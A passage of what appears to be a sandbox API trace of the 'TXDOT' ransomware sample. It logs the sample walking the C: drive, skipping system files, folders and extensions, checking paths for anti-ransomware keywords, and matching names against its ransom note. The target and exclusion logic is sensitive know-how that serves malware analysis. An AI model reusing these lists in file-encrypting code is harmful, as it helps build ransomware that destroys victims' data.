(psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.867] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0128.867] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.867] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0128.867] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=".") returned 1 [0128.867] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="..") returned 1 [0128.867] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.867] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.867] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" [0128.867] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0128.867] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="iconcache.db") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="thumbs.db") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransomware ") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransom ") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="debug.txt") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="boot.ini") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="desktop.ini") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="autorun.inf") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntldr") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.867] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0128.867] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.867] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0128.868] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=".") returned 1 [0128.868] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="..") returned 1 [0128.868] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.868] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.868] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" [0128.868] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0128.868] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0128.868] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0128.868] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="iconcache.db") returned 1 [0128.868] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="thumbs.db") returned 1 [0128.868] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransomware ") returned 1 [0128.868] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransom ") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="debug.txt") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="boot.ini") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="desktop.ini") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="autorun.inf") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntldr") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.916] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0128.916] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.916] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0128.916] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=".") returned 1 [0128.916] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="..") returned 1 [0128.916] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.916] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.916] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" [0128.916] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0128.916] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="iconcache.db") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="thumbs.db") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransomware ") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransom ") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="debug.txt") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="boot.ini") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="desktop.ini") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="autorun.inf") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntldr") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0128.916] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0128.917] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.917] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0128.917] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.917] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0128.917] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0128.917] GetProcessHeap () returned 0xe30000 [0128.917] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0128.917] StrCmpW (psz1="Boot", psz2=".") returned 1 [0128.917] StrCmpW (psz1="Boot", psz2="..") returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0128.917] StrCmpW (psz1="bootmgr", psz2=".") returned 1 [0128.917] StrCmpW (psz1="bootmgr", psz2="..") returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0128.917] StrCmpW (psz1="BOOTNXT", psz2=".") returned 1 [0128.917] StrCmpW (psz1="BOOTNXT", psz2="..") returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0128.917] StrCmpW (psz1="BOOTSECT.BAK", psz2=".") returned 1 [0128.917] StrCmpW (psz1="BOOTSECT.BAK", psz2="..") returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0128.917] StrCmpW (psz1="Documents and Settings", psz2=".") returned 1 [0128.917] StrCmpW (psz1="Documents and Settings", psz2="..") returned 1 [0128.917] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0128.917] StrCmpW (psz1="ESD", psz2=".") returned 1 [0128.917] StrCmpW (psz1="ESD", psz2="..") returned 1 [0128.917] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.917] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.917] StrNCatW (in: psz1="C:\\", psz2="ESD", cchMax=1030 | out: psz1="C:\\ESD") returned="C:\\ESD" [0128.917] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system32\\") returned 0x0 [0128.917] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.917] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\system\\") returned 0x0 [0128.917] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\local\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\boot\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\perflogs\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\programdata\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\drivers\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\wsus\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="crypt_detect") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="cryptolocker") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="ransomware") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\WINDOWS") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.918] StrStrIW (lpFirst="C:\\ESD", lpSrch="C:\\Program Files") returned 0x0 [0128.918] GetProcessHeap () returned 0xe30000 [0128.918] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48e) returned 0xf0daf8 [0128.918] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ESD", cchMax=1038 | out: psz1="C:\\ESD") returned="C:\\ESD" [0128.918] StrNCatW (in: psz1="C:\\ESD", psz2="\\*", cchMax=1038 | out: psz1="C:\\ESD\\*") returned="C:\\ESD\\*" [0128.918] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.918] StrCmpW (psz1=".", psz2=".") returned 0 [0128.918] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.918] StrCmpW (psz1="..", psz2=".") returned 1 [0128.918] StrCmpW (psz1="..", psz2="..") returned 0 [0128.918] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0128.919] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.919] GetProcessHeap () returned 0xe30000 [0128.919] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.919] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab460c6f, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0128.919] StrCmpW (psz1="hiberfil.sys", psz2=".") returned 1 [0128.919] StrCmpW (psz1="hiberfil.sys", psz2="..") returned 1 [0128.919] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0128.919] StrCmpW (psz1="Logs", psz2=".") returned 1 [0128.919] StrCmpW (psz1="Logs", psz2="..") returned 1 [0128.919] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.919] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.919] StrNCatW (in: psz1="C:\\", psz2="Logs", cchMax=1030 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system32\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\system\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\local\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\boot\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\perflogs\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\programdata\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\drivers\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\wsus\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="crypt_detect") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="cryptolocker") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="ransomware") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\WINDOWS") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.919] StrStrIW (lpFirst="C:\\Logs", lpSrch="C:\\Program Files") returned 0x0 [0128.920] GetProcessHeap () returned 0xe30000 [0128.920] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x490) returned 0xf0daf8 [0128.920] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.920] StrNCatW (in: psz1="C:\\Logs", psz2="\\*", cchMax=1040 | out: psz1="C:\\Logs\\*") returned="C:\\Logs\\*" [0128.920] FindFirstFileW (in: lpFileName="C:\\Logs\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.920] StrCmpW (psz1=".", psz2=".") returned 0 [0128.920] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x5acc9565, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.921] StrCmpW (psz1="..", psz2=".") returned 1 [0128.921] StrCmpW (psz1="..", psz2="..") returned 0 [0128.921] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59702ac0, ftCreationTime.dwHighDateTime=0x1d64bcf, 